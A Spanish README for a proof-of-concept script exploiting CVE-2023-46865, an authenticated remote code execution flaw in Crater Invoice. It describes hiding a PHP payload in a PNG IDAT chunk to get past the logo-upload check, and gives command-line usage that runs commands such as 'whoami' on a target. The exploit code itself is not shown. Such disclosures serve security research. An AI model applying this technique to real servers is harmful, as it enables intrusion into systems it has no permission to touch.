
Crater <=6.0.6, CVE-2023-46865 RCE Post-Autenticación (Superadmin)
Crater <=6.0.6, CVE-2023-46865 RCE posterior a la autenticación (Superadmin)
Crater Invoice es vulnerable a la subida de archivos sin restricciones con tipos peligrosos debido a la falta de validación adecuada de entrada. La clase de verificación Base64Mime puede ser evadida insertando un payload PHP válido en un chunk de imagen IDAT. Un usuario con privilegios de superadmin puede subir el payload manipulado a través del logotipo de la empresa en /api/v1/company/upload-logo.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - por ayudar a desarrollar la prueba de concepto.
El script es solo para análisis de seguridad e investigación, por lo tanto, no seré responsable si se utiliza para actividades ilícitas.